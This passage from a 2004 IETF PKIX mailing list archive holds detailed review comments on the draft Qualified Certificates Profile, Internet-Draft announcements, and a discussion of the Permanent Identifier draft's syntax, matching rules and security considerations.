a certificate policy included in the certificate policies extension, and - As a statement included in the Qualified Certificates Statements extension." As far as "EU Qualified Certificates" are concerned, the ways are not "complementary", but "alternative". Since no CP OID is being defined in the document to indicate this "property" (which is quite vague), this cannot be supported. Since no statement is being defined in the document to indicate this "property" (which is quite vague), this cannot be supported. Please delete the whole section 2.2. 16. The text states in section 2.3 Policy Issues "Certain policy aspects define the context in which this profile is to be understood and used. It is however outside the scope of this profile to specify any policies or legal aspects that will govern services that issue or utilize certificates according to this profile." Is it necessary to say that some other documents (please keep away "policy aspects") whatever they are may use this document ? Isn't it the primary goal of any standard ? Please delete this paragraph. 17. The text states in section 2.3 Policy Issues: "It is however an underlying assumption in this profile that a responsible issuing CA will undertake to follow a publicly available certificate policy that is consistent with its liabilities, practices and procedures." This assumption is not valid. Nothing will force a CA to adopt a publicly available policy. Please delete this paragraph. 18. The text states in section 2.4 Uniqueness of names An object can be assigned a distinguished name without being represented by an entry in the Directory, but this name is then the name its object entry could have had if it were represented in the Directory. In the context of qualified certificates, a distinguished name denotes a set of attribute values [X.501] which forms a name that is unambiguous within a certain domain that forms either a real or a virtual DIT (Directory Information Tree)[X.501]. In the case of subject names the domain is assumed to be at least the issuing domain of the CA. These sentences do not help to understand the issue of uniqueness of names. The fact that there is a real DIT or not is irrelevant. The notion of a certain domain and at least the issuing domain is hazardous. Please delete these sentences and keep the last sentence which is correct: The distinguished name MUST be unique for each subject entity certified by the one CA as defined by the issuer name field, during the whole life time of the CA. 19. The text states in section 3.1.1 Issuer The identity of the issuer SHALL be specified using an appropriate subset of the following attributes: Please change identity by DN. 20. The text states in section 3.1.1 Issuer : Attributes present in the issuer field SHOULD be consistent with the laws under which the issuer operates. We do not reference laws in other documents, but Certificate Policies instead. Please refer to Certificate policies, and replace with: Attributes present in the issuer field SHOULD be consistent with the certificate policy of the certificate. 21. The text states in section 3.1.1 Issuer : A relying party MAY have to consult associated certificate policies and/or the issuer's CPS, in order to determine the semantics of name fields and the laws under which the issuer operates. Please delete the end of the sentence, i.e. and the laws under which the issuer operates. There is no reason to refer to laws. 22. The text states in section 3.1.2 Subject (page 8): Other attributes may be present but MUST NOT be necessary to distinguish the subject name from other subject names within the issuer domain. This sentence is wrong. The DN is uniquely global with all the attributes present. Matching rules do not exclude some attributes. This sentence could be interpreted as if a name matching rule could be constructed using only these attributes and ignoring the additional ones. Please delete that sentence. 23. The text states in section 3.1.2 Subject (pages 8 and 9): The surname and givenName attribute types SHALL, if present, contain the name of the subject, in accordance with the laws under which the CA prepares the certificate. These attributes SHALL be used in the subject field if the commonName attribute is not present. In cases where the subject only has a single name registered, the givenName attribute SHALL be used and the surname attribute SHALL be omitted. What is the registered name of the subject ? Who is registering the name ? Which laws is it ? Is it the laws where the CA operates ? Do all countries have a law to say what is a registered name ? Please to not refer to registered names and national laws. The surname and givenName attribute types SHALL be used in the subject field if the commonName attribute is not present. In cases where the subject only has a givenName the surname attribute SHALL be omitted. 24. The text states in section 3.2 Certificate Extensions: This specification provides additional details regarding the contents of five certificate extensions: Subject directory attributes, Certificate policies, Key usage, Biometric information and Qualified Certificate statements. This is not correct. It is not details regarding the content of five certificate extensions, but a profile for two basic fields, three existing extensions and the definition of two new extensions. Change with: This specification provides profiles for two fields: issuer and subject and for three certificate extensions: subject alternate name, subject directory attributes, and key usage. It also defines two extensions: biometric information and qualified certificate statements. 25. The text defines in section 3.2.1 Subject Directory Attributes. Why is there no specification at all for the Subject Alternative Name ? There should be a section saying that Internet electronic mail addresses SHALL be placed there, if e-mail addresses need to be present. 26. The text states in section 3.2.2 Certificate Policies: Information provided by the issuer stating the purpose of the certificate as discussed in Section 2.2 SHOULD be evident through indicated policies. It is not evident from an OID to know what the certificate policy is about. Since section 2.2 should be deleted, this sentence should be deleted as well. 27. The text states in section 3.2.2 Certificate Policies: The certificate policies extension SHOULD include all policy information needed for validation of the certificate. The Certificate Policies extensions defines everything that is needed. There is nothing to be added here. Please delete that sentence. 28. The text states in section 3.2.2 Certificate Policies: If policy information is included in the QCStatements extension (see 3.2.5), then this information SHOULD also be defined by indicated policies. QCStatements extension is still not described at this place when reading the document in sequence. This sentence is not relevant and could even be misleading: QCStatements is not a direct alternative to a certificate policy. It may indicate a conformity with a document where some parts of it may be translated into a certificate policy. Please delete that sentence. 29. It is very questionable why there should be a section 3.2.2 at all. There is no additional specific constraints beyond what already exists in RFC 3280. Please delete the whole section 3.2.2. 30. The text states in section 3.2.3 Key Usage: The key usage extension SHALL be present. Key usage settings SHALL be set in accordance with RFC 3280 definitions. Further requirements on key usage settings MAY be defined by local policy and/or local legal requirements. The security consideration section states: Combining the nonRepudiation bit in the keyUsage certificate extension with other keyUsage bits may have security implications and this specification therefore recommends against such practices. This is quite true. However the main body of the document is lacking this recommendation. The text that is currently in RFC 3039 should stay. It should be adapted to avoid naming bit 1 as nonRepudiation since it is likely that the name of that bit will be changed by ISO. So speaking of bit 1 is neutral and will be valid whatever the final name will be. Please replace with: The key usage extension SHALL be present. If the key usage bit 1 is asserted then it SHOULD NOT be combined with any other key usage, i.e., if set, it SHOULD be set exclusively (see the security considerations section). 31. The text states in section 3.2.3 Key Usage: The key usage extension MAY be marked critical. However, RFC 3280 states: When this extension appears, it SHOULD be marked critical. The MAY should be changed into SHOULD. This leads to: The key usage extension SHOULD be marked critical. 32. The text states in section 3.2.5 Qualified Certificate Statements: A statement suitable for inclusion in this extension MAY be a statement by the issuer that the certificate is issued as a Qualified Certificate in accordance with a particular legal system (as discussed in Section 2.2). Providing examples before the actual definition of what is this extension is not appropriate. It should also be avoided to speak about legal systems. Please delete. 33. The text states in section 3.2.5 Qualified Certificate Statements: Other statements suitable for inclusion in this extension MAY be statements related to the applicable legal jurisdiction within which the certificate is issued. As an example this MAY include a maximum reliance limit for the certificate indicating restrictions on CA's liability. Providing examples before the actual definition of what is this extension is not appropriate. It should also be avoided to speak about legal jurisdiction. Please delete. 34. The text states in section 3.2.5 Qualified Certificate Statements: This extension may be critical or non-critical. If the extension is critical, this means that all statements included in the extension are regarded as critical. A note should be added after the ASN.1 description : NOTE: This extension does not allow to mix critical and non-critical Qualified Certificate Statements. Either all statements must be critical or all statements must be non-critical. 35. The text states in section 3.2.5.1 Predefined Statements: RFC 3039 defined one qualified certificate statement (id-qcs- pkixQCSyntax-v1), identifying conformance with syntax and semantics defined in RFC 3039. What means conformance with syntax and semantics ? Conformance clauses means that the SHALL statements have to be observed by the CA. From which sections should the SHALL statements be observed ? The document provides a profile for two fields: issuer and subject, for one mandatory certificate extensions: key usage and for two optional certificate extensions: subject alternate name and subject directory attributes. It means conformance with sections 3.1.1. Issuer, 3.1.2 subject, 3.2.3 key usage; if subject directory attributes is present, with section 3.2.1.; and if subject alternate name attribute is present, with section 3.2.X. There is however a major problem: if RFC3039 is withdrawn, then there would be no text to say what it means. So RFC 3039 cannot be withdrawn without knowing first if someone as ever implemented id-qcs-pkixQCSyntax-v1. 36. The text states in section 3.2.5.1 Predefined Statements: This profile includes a new qualified certificate statement (identified by the OID id-qcs-pkixQCSyntax-v2), identifying conformance with syntax and semantics defined in this profile. The sentence should be corrected in the following way: This profile includes a qualified certificate statement (identified by the OID id-qcs-pkixQCSyntax-v2), identifying conformance with sections 3.1.1. Issuer, 3.1.2 subject, 3.2.3 key usage ; if subject directory attributes is present, with section 3.2.1.; and if subject alternate name attribute is present, with section 3.2.X. 37. The text states in section 3.2.5.1 Predefined Statements: This Qualified Certificate profile is referred to as version 2 while RFC 3039 is referred to as version 1. This sentence cannot stay and will need to be fixed. See comment 35. 38. The European Directive on Electronic Signatures should be referenced in the informative references section (section 5.2). END OF COMMENTS Denis > A New Internet-Draft is available from the on-line Internet-Drafts directories. > This draft is a work item of the Public-Key Infrastructure (X.509) Working Group of the IETF. > > Title : Internet X.509 Public Key Infrastructure: Qualified Certificates Profile > Author(s) : S. Santesson, M. Nystrom > Filename : draft-ietf-pkix-sonof3039-03.txt > Pages : 35 > Date : 2004-1-20 > > This document forms a certificate profile, based on RFC 3280, for > identity certificates issued to natural persons. > > The profile defines specific conventions for certificates that are > qualified within a defined legal framework, named Qualified > Certificates. The profile does however not define any legal > requirements for such Qualified Certificates. > > The goal of this document is to define a certificate profile that > supports issuance of Qualified Certificates independent of local > legal requirements. The profile is however not limited to Qualified > Certificates and further profiling may facilitate specific local > needs. > > A URL for this Internet-Draft is: > http://www.ietf.org/internet-drafts/draft-ietf-pkix-sonof3039-03.txt > > To remove yourself from the IETF Announcement list, send a message to > ietf-announce-request with the word unsubscribe in the body of the message. > > Internet-Drafts are also available by anonymous FTP. Login with the username > "anonymous" and a password of your e-mail address. After logging in, > type "cd internet-drafts" and then > "get draft-ietf-pkix-sonof3039-03.txt". > > A list of Internet-Drafts directories can be found in > http://www.ietf.org/shadow.html > or ftp://ftp.ietf.org/ietf/1shadow-sites.txt > > > Internet-Drafts can also be obtained by e-mail. > > Send a message to: > mailserv@ietf.org. > In the body type: > "FILE /internet-drafts/draft-ietf-pkix-sonof3039-03.txt". > > NOTE: The mail server at ietf.org can return the document in > MIME-encoded form by using the "mpack" utility. To use this > feature, insert the command "ENCODING mime" before the "FILE" > command. To decode the response(s), you will need "munpack" or > a MIME-compliant mail reader. Different MIME-compliant mail readers > exhibit different behavior, especially when dealing with > "multipart" MIME messages (i.e. documents which have been split > up into multiple messages), so check your local documentation on > how to manipulate these messages. > > > Below is the data which will enable a MIME compliant mail reader > implementation to automatically retrieve the ASCII version of the > Internet-Draft. Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.10/8.12.8) with ESMTP id i0NL2Oib018684; Fri, 23 Jan 2004 13:02:24 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.10/8.12.9/Submit) id i0NL2OLY018683; Fri, 23 Jan 2004 13:02:24 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from ietf.org (odin.ietf.org [132.151.1.176]) by above.proper.com (8.12.10/8.12.8) with ESMTP id i0NL2Nib018677 for <ietf-pkix@imc.org>; Fri, 23 Jan 2004 13:02:23 -0800 (PST) (envelope-from dinaras@cnri.reston.va.us) Received: from CNRI.Reston.VA.US (localhost [127.0.0.1]) by ietf.org (8.9.1a/8.9.1a) with ESMTP id QAA22524; Fri, 23 Jan 2004 16:02:22 -0500 (EST) Message-Id: <200401232102.QAA22524@ietf.org> Mime-Version: 1.0 Content-Type: Multipart/Mixed; Boundary="NextPart" To: IETF-Announce: ; Cc: ietf-pkix@imc.org From: Internet-Drafts@ietf.org Reply-to: Internet-Drafts@ietf.org Subject: I-D ACTION:draft-ietf-pkix-sonof3039-04.txt Date: Fri, 23 Jan 2004 16:02:22 -0500 Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> --NextPart A New Internet-Draft is available from the on-line Internet-Drafts directories. This draft is a work item of the Public-Key Infrastructure (X.509) Working Group of the IETF. Title : Internet X.509 Public Key Infrastructure: Qualified Certificates Profile Author(s) : S. Santesson, M. Nystrom Filename : draft-ietf-pkix-sonof3039-04.txt Pages : 35 Date : 2004-1-23 This document forms a certificate profile, based on RFC 3280, for identity certificates issued to natural persons. The profile defines specific conventions for certificates that are qualified within a defined legal framework, named Qualified Certificates. The profile does however not define any legal requirements for such Qualified Certificates. The goal of this document is to define a certificate profile that supports issuance of Qualified Certificates independent of local legal requirements. The profile is however not limited to Qualified Certificates and further profiling may facilitate specific local needs. The goal of this document is to define a certificate profile that supports issuance of Qualified Certificates independent of local legal requirements. The profile is however not limited to Qualified Certificates and further profiling may facilitate specific local needs. A URL for this Internet-Draft is: http://www.ietf.org/internet-drafts/draft-ietf-pkix-sonof3039-04.txt To remove yourself from the IETF Announcement list, send a message to ietf-announce-request with the word unsubscribe in the body of the message. Internet-Drafts are also available by anonymous FTP. Login with the username "anonymous" and a password of your e-mail address. After logging in, type "cd internet-drafts" and then "get draft-ietf-pkix-sonof3039-04.txt". A list of Internet-Drafts directories can be found in http://www.ietf.org/shadow.html or ftp://ftp.ietf.org/ietf/1shadow-sites.txt Internet-Drafts can also be obtained by e-mail. Send a message to: mailserv@ietf.org. In the body type: "FILE /internet-drafts/draft-ietf-pkix-sonof3039-04.txt". NOTE: The mail server at ietf.org can return the document in MIME-encoded form by using the "mpack" utility. To use this feature, insert the command "ENCODING mime" before the "FILE" command. To decode the response(s), you will need "munpack" or a MIME-compliant mail reader. Different MIME-compliant mail readers exhibit different behavior, especially when dealing with "multipart" MIME messages (i.e. documents which have been split up into multiple messages), so check your local documentation on how to manipulate these messages. Below is the data which will enable a MIME compliant mail reader implementation to automatically retrieve the ASCII version of the Internet-Draft. --NextPart Content-Type: Multipart/Alternative; Boundary="OtherAccess" --OtherAccess Content-Type: Message/External-body; access-type="mail-server"; server="mailserv@ietf.org" Content-Type: text/plain Content-ID: <2004-1-23162222.I-D@ietf.org> ENCODING mime FILE /internet-drafts/draft-ietf-pkix-sonof3039-04.txt --OtherAccess Content-Type: Message/External-body; name="draft-ietf-pkix-sonof3039-04.txt"; site="ftp.ietf.org"; access-type="anon-ftp"; directory="internet-drafts" Content-Type: text/plain Content-ID: <2004-1-23162222.I-D@ietf.org> --OtherAccess-- --NextPart-- Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.10/8.12.8) with ESMTP id i0NKPmib017368; Fri, 23 Jan 2004 12:25:48 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.10/8.12.9/Submit) id i0NKPm2w017367; Fri, 23 Jan 2004 12:25:48 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from USBOSWMTRP01.na.fbf1.com (bosmail.bkb.com [204.167.53.91]) by above.proper.com (8.12.10/8.12.8) with SMTP id i0NKPkib017360 for <ietf-pkix@imc.org>; Fri, 23 Jan 2004 12:25:46 -0800 (PST) (envelope-from TIRTHANKAR_BARARI@fleet.com) Received: from 155.182.90.44 by USBOSWMTRP01.na.fbf1.com (InterScan E-Mail VirusWall NT); Fri, 23 Jan 2004 15:13:01 -0500 Received: by usbosmxcp04.ma.fbf1.com with Internet Mail Service (5.5.2653.19) id <D33DC8M0>; Fri, 23 Jan 2004 15:13:53 -0500 Message-ID: <B9347A7A668DC84290DC609C86848EF61947AC@usboswmxmp03.ma.fbf1.com> From: "BARARI, TIRTHANKAR" <TIRTHANKAR_BARARI@fleet.com> To: "'Internet-Drafts@ietf.org'" <Internet-Drafts@ietf.org> Cc: ietf-pkix@imc.org Subject: RE: I-D ACTION:draft-ietf-pkix-pi-08.txt Date: Fri, 23 Jan 2004 15:13:38 -0500 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> Hi Denis and Thomas, My comments on the draft - In real world, PI implementation will be in phases. So, entities would migrate from existing certificates (without PI) to new ones with PI included in the subjectAltName extension. It would be good to include a way to tie in the prior identity into the new implementation with PI (possibly by adding the old public key as a field inside PI). This would help link both pre and post implementation audit records to the same entity. This may not be within the scope or address of this version, but may be worth a consideration for a future richer proposal. Tirthankar Barari -----Original Message----- From: Internet-Drafts@ietf.org [mailto:Internet-Drafts@ietf.org] Sent: Wednesday, January 21, 2004 4:27 PM Cc: ietf-pkix@imc.org Subject: I-D ACTION:draft-ietf-pkix-pi-08.txt A New Internet-Draft is available from the on-line Internet-Drafts directories. This draft is a work item of the Public-Key Infrastructure (X.509) Working Group of the IETF. Title : Internet X.509 Public Key Infrastructure Permanent Identifier Author(s) : D. Pinkas, T. Gindin Filename : draft-ietf-pkix-pi-08.txt Pages : 12 Date : 2004-1-21 This document define a new form of name, called permanent identifier, that may be included in the subjectAltName extension of a public key certificate issued to an entity. The permanent identifier is an optional feature that may be used by a CA to indicate that the certificate relates to the same entity even if the name or the affiliation of that entity stored in the subject or another name form in the subjectAltName extension has changed. The subject name, carried in the subject field, is only unique for each subject entity certified by the one CA as defined by the issuer name field. Also, the new name form can carry a name that is unique for each subject entity certified by a CA. A URL for this Internet-Draft is: http://www.ietf.org/internet-drafts/draft-ietf-pkix-pi-08.txt To remove yourself from the IETF Announcement list, send a message to ietf-announce-request with the word unsubscribe in the body of the message. Internet-Drafts are also available by anonymous FTP. Login with the username "anonymous" and a password of your e-mail address. After logging in, type "cd internet-drafts" and then "get draft-ietf-pkix-pi-08.txt". A list of Internet-Drafts directories can be found in http://www.ietf.org/shadow.html or ftp://ftp.ietf.org/ietf/1shadow-sites.txt Internet-Drafts can also be obtained by e-mail. Send a message to: mailserv@ietf.org. In the body type: "FILE /internet-drafts/draft-ietf-pkix-pi-08.txt". NOTE: The mail server at ietf.org can return the document in MIME-encoded form by using the "mpack" utility. To use this feature, insert the command "ENCODING mime" before the "FILE" command. To decode the response(s), you will need "munpack" or a MIME-compliant mail reader. Different MIME-compliant mail readers exhibit different behavior, especially when dealing with "multipart" MIME messages (i.e. documents which have been split up into multiple messages), so check your local documentation on how to manipulate these messages. Below is the data which will enable a MIME compliant mail reader implementation to automatically retrieve the ASCII version of the Internet-Draft. Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.10/8.12.8) with ESMTP id i0NGQpib006816; Fri, 23 Jan 2004 08:26:51 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.10/8.12.9/Submit) id i0NGQpi5006815; Fri, 23 Jan 2004 08:26:51 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from smtp4.pacifier.net (smtp4.pacifier.net [64.255.237.174]) by above.proper.com (8.12.10/8.12.8) with ESMTP id i0NGQnib006809 for <ietf-pkix@imc.org>; Fri, 23 Jan 2004 08:26:49 -0800 (PST) (envelope-from jimsch@nwlink.com) Received: from ROMANS (ip237.132.dial-acs01.sea.iinet.com [209.20.132.237]) by smtp4.pacifier.net (Postfix) with ESMTP id 0E5EA6ACE0; Fri, 23 Jan 2004 08:26:48 -0800 (PST) Reply-To: <jimsch@exmsft.com> From: "Jim Schaad" <jimsch@nwlink.com> To: "'Denis Pinkas'" <Denis.Pinkas@bull.net>, <jimsch@exmsft.com> Cc: "'Tom Gindin'" <tgindin@us.ibm.com>, <ietf-pkix@imc.org> Subject: RE: I-D ACTION:draft-ietf-pkix-pi-08.txt Date: Fri, 23 Jan 2004 08:30:44 -0800 Message-ID: <008a01c3e1ce$4049d940$1400a8c0@augustcellars.local> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2627 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165 Importance: Normal In-Reply-To: <40111E2D.70605@bull.net> Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> Denis, Thank you -- this addresses all of my concerns. jim > -----Original Message----- > From: Denis Pinkas [mailto:Denis.Pinkas@bull.net] > Sent: Friday, January 23, 2004 5:14 AM > To: jimsch@exmsft.com > Cc: 'Tom Gindin'; ietf-pkix@imc.org > Subject: Re: I-D ACTION:draft-ietf-pkix-pi-08.txt > > > Jim, > > Thank you for your document quality checking. > > > Comments on draft -08. > > > > 1. Privacy concerns should be additionally outlined and covered in > > the security considerations section. > > This point is already covered. Here is the text : > > The permanent identifier allows organizations to create links > between different certificates associated with an entity issued > with or without overlapping validity periods. This > ability to link > different certificates may conflict with privacy. It is therefore > important that a CA clearly disclose any plans to issue > certificates > which include a permanent identifier to potential > subjects of those > certificates. > > > 2. Section 1, para 9: Text here allows for an AA to have a > unique URI > > name. Has been removed from the syntax. > > You were so fast by replying to the publication, that I had > not the time to > advertise the main reason for issuing this new draft. > > It is because the IESG objected to include URI in the > document and that we > (i.e. Tom and myself) have been unable to find a compromise > with the IESG. > So we have removed the URI option. You are correct: this > sentence should > have been deleted. > > Done. > > > 3. Section 1, para 14: Suggested text "both the same permanent > > identifier value and the same Authority Identifer Value, > then these". > > (I find the use of identityType to be confusing since I > consider this > > to relate to type choice of IdentifierValue as well.) > > "identityType" is not used. "identifierType" is used instead. > The ASN.1 for identifierType is : > > identifierType OBJECT IDENTIFIER OPTIONAL > > The current text is: > > "When two certificates from different CA's contain both the same > permanent identifier value and the same type of permanent > identifier from a given Assigner Authority, then these > certificates relate to the same entity, whatever the content of > the DN or other subjectAltName components may be." > > Changing "same type of permanent identifier" by "Authority > Identifer Value" > would not be appropriate. The identifierType does not simply > identify the > Authority, but also the type of identifier being used. > > I would propose the following text: > > When two certificates from the same CA or from different CA's > contain both the same permanent identifier value and the same > identifier type value, then these certificates relate to the > same entity, whatever the content of the DN or other > subjectAltName > components may be. > > > 4. Section 2: What is the criteria for use of iA5String vs > > uTF8String? > > Good question. No good answer ! I thus propose to simplify > and just have the > following: > > PermanentIdentifier ::= SEQUENCE { > identifierValue UTF8String, > identifierType OBJECT IDENTIFIER OPTIONAL } > > Here is the new text for UTF8. > > The IdentifierValue supports one syntax: UTF8String. UTF8String is > variable length data of octets. The UTF8String syntax is used to > express a string of characters from the Universal Character Set > - UCS [ISO10646] (a superset of [Unicode]), encoded following the > [UTF-8] algorithm. The UCS allows support of most of the world's > writing systems using a single character set. > > Note that Unicode characters U+0000 through U+007F are the same as > ASCII 0 through 127, respectively, and have the same single octet > UTF-8 encoding. Other Unicode characters have a multiple octet > UTF-8 encoding. > > > 5. Section 2: When doing comparisons do I need to cross compare > > these two different value items? > > Added the following: > > The following matching rule SHALL be used for the identifierValue: > the rule evaluates to TRUE if and only if the code points > [Unicode] > of each of the characters is equal. > > Also added the following references: > > [Unicode] The Unicode Consortium, "The Unicode Standard, Version > 3.2.0" is defined by "The Unicode Standard, Version 3.0" > (Reading, MA, Addison-Wesley, 2000. ISBN 0-201-61633-5), > as amended > by the "Unicode Standard Annex #27: Unicode 3.1" > (http://www.unicode.org/reports/tr27/) and by the > "Unicode Standard > Annex #28: Unicode 3.2" (http://www.unicode.org/reports/tr28/). > > [ISO10646] Universal Multiple-Octet Coded Character Set (UCS) - > Architecture and Basic Multilingual Plane, ISO/IEC 10646-1: 1993. > > [UTF-8] RFC 2279. F. Yergeau. UTF-8, a transformation format of > ISO 10646, January 1998. > > > 6. Section 2: The statement 'It is an OID.' is redundant > and can be > > removed. > > OK. Forgotten. > > > 7. Section 3: Contains a paragraph dealing with matching rules. > > Since this is no longer a field in the structure the > paragraph should > > be re-written to state what the one and only matching rule is. > > See the response to the issue number 5. > > > 8. Appendix A.1: New request, please put a reference to > the document > > containing the pkix module into the pkix document (i.e. > something like > > "-- found in [RFC 3280]". This prevents documents from importing > > modules that are lower in the standards process without having any > > explicit reference to them. > > Added: > > -- from [RFC 3280] > > Before I update the document and place it on the web server, > I would be > grateful to get your response on these proposals. > > Denis > > > jim > > > > > > > >>-----Original Message----- > >>From: owner-ietf-pkix@mail.imc.org > >>[mailto:owner-ietf-pkix@mail.imc.org] On Behalf Of > >>Internet-Drafts@ietf.org > >>Sent: Wednesday, January 21, 2004 1:27 PM > >>To: IETF-Announce: > >>Cc: ietf-pkix@imc.org > >>Subject: I-D ACTION:draft-ietf-pkix-pi-08.txt > >> > >> > >>A New Internet-Draft is available from the on-line > >>Internet-Drafts directories. This draft is a work item of the > >>Public-Key Infrastructure (X.509) Working Group of the IETF. > >> > >> Title : Internet X.509 Public Key > >>Infrastructure Permanent Identifier > >> Author(s) : D. Pinkas, T. Gindin > >> Filename : draft-ietf-pkix-pi-08.txt > >> Pages : 12 > >> Date : 2004-1-21 > >> > >>This document define a new form of name, called permanent > >>identifier, that may be included in the subjectAltName extension > >>of a public key certificate issued to an entity. > >>The permanent identifier is an optional feature that may be used > >>by a CA to indicate that the certificate relates to the same > >>entity even if the name or the affiliation of that entity stored > >>in the subject or another name form in the subjectAltName extension > >>has changed. > >>The subject name, carried in the subject field, is only unique > >>for each subject entity certified by the one CA as defined by the > >>issuer name field. Also, the new name form can carry a > >>name that is unique for each subject entity certified by a CA. > >> > >>A URL for this Internet-Draft is: > >>http://www.ietf.org/internet-drafts/draft-> ietf-pkix-pi-08.txt > >> > >> > >>To remove yourself from the IETF > >>Announcement list, send a message to > >>ietf-announce-request with the word unsubscribe in the body > >>of the message. > >> > >>Internet-Drafts are also available by anonymous FTP. Login > >>with the username "anonymous" and a password of your e-mail > >>address. After logging in, type "cd internet-drafts" and then > >> "get draft-ietf-pkix-pi-08.txt". > >> > >>A list of Internet-Drafts directories can be found in > > > > http://www.ietf.org/shadow.html > > or ftp://ftp.ietf.org/ietf/1shadow-sites.txt > > > > > > Internet-Drafts can also be obtained by e-mail. > > > > Send a message to: > > mailserv@ietf.org. > > In the body type: > > "FILE /internet-drafts/draft-ietf-pkix-pi-08.txt". > > > > NOTE: The mail server at ietf.org can return the document in > > MIME-encoded form by using the "mpack" utility. To use this > > feature, insert the command "ENCODING mime" before the "FILE" > > command. To decode the response(s), you will need "munpack" or > > a MIME-compliant mail reader. Different MIME-compliant > mail readers > > exhibit different behavior, especially when dealing with > > "multipart" MIME messages (i.e. documents which have been split > > up into multiple messages), so check your local documentation on > > how to manipulate these messages. > > > > > > Below is the data which will enable a MIME compliant mail reader > > implementation to automatically retrieve the ASCII version of the > > Internet-Draft. > > > > > > Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.10/8.12.8) with ESMTP id i0NFo4ib004393; Fri, 23 Jan 2004 07:50:04 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.10/8.12.9/Submit) id i0NFo43U004392; Fri, 23 Jan 2004 07:50:04 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from host13.websitesource.com (host13.websitesource.com [209.239.35.152]) by above.proper.com (8.12.10/8.12.8) with ESMTP id i0NFo2ib004378 for <ietf-pkix@imc.org>; Fri, 23 Jan 2004 07:50:03 -0800 (PST) (envelope-from chokhani@orionsec.com) Received: from wchokhani (dpvc-138-88-161-20.res.east.verizon.net [138.88.161.20]) by host13.websitesource.com (8.12.10/8.12.10) with ESMTP id i0NFnvnY005916 for <ietf-pkix@imc.org>; Fri, 23 Jan 2004 10:49:57 -0500 From: "Santosh Chokhani" <chokhani@orionsec.com> To: <ietf-pkix@imc.org> Subject: RE: I-D ACTION:draft-ietf-pkix-pi-08.txt Date: Fri, 23 Jan 2004 10:49:54 -0500 Message-ID: <022501c3e1c8$8e3850b0$4a404d0c@hq.orionsec.com> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.4510 Importance: Normal In-Reply-To: <40111E2D.70605@bull.net> X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165 Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by above.proper.com id i0NFo3ib004386 Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> Denis and Tom: Section 3, Security Considerations, Page 4, paragraph 6 for the Section, of the RFC contains description of how to match PI when identifier type is absent. One of the comparison is that of public keys. While being a good comparison, it can give you false results in case of CA key roll-over. Do you think it is worth mentioning. The other match described in the same epigraph for CA names may have problems also if there are any self-issued certificates for key roll-over. -----Original Message----- From: owner-ietf-pkix@mail.imc.org [mailto:owner-ietf-pkix@mail.imc.org] On Behalf Of Denis Pinkas Sent: Friday, January 23, 2004 8:14 AM To: jimsch@exmsft.com Cc: 'Tom Gindin'; ietf-pkix@imc.org Subject: Re: I-D ACTION:draft-ietf-pkix-pi-08.txt Jim, Thank you for your document quality checking. > Comments on draft -08. > > 1. Privacy concerns should be additionally outlined and covered in > the security considerations section. This point is already covered. Here is the text : The permanent identifier allows organizations to create links between different certificates associated with an entity issued with or without overlapping validity periods. This ability to link different certificates may conflict with privacy. It is therefore important that a CA clearly disclose any plans to issue certificates which include a permanent identifier to potential subjects of those certificates. > 2. Section 1, para 9: Text here allows for an AA to have a unique URI > name. Has been removed from the syntax. You were so fast by replying to the publication, that I had not the time to advertise the main reason for issuing this new draft. It is because the IESG objected to include URI in the document and that we (i.e. Tom and myself) have been unable to find a compromise with the IESG. So we have removed the URI option. You are correct: this sentence should have been deleted. Done. > 3. Section 1, para 14: Suggested text "both the same permanent > identifier value and the same Authority Identifer Value, then these". > (I find the use of identityType to be confusing since I consider this > to relate to type choice of IdentifierValue as well.) "identityType" is not used. "identifierType" is used instead. The ASN.1 for identifierType is : identifierType OBJECT IDENTIFIER OPTIONAL The current text is: "When two certificates from different CA's contain both the same permanent identifier value and the same type of permanent identifier from a given Assigner Authority, then these certificates relate to the same entity, whatever the content of the DN or other subjectAltName components may be." Changing "same type of permanent identifier" by "Authority Identifer Value" would not be appropriate. The identifierType does not simply identify the Authority, but also the type of identifier being used. I would propose the following text: When two certificates from 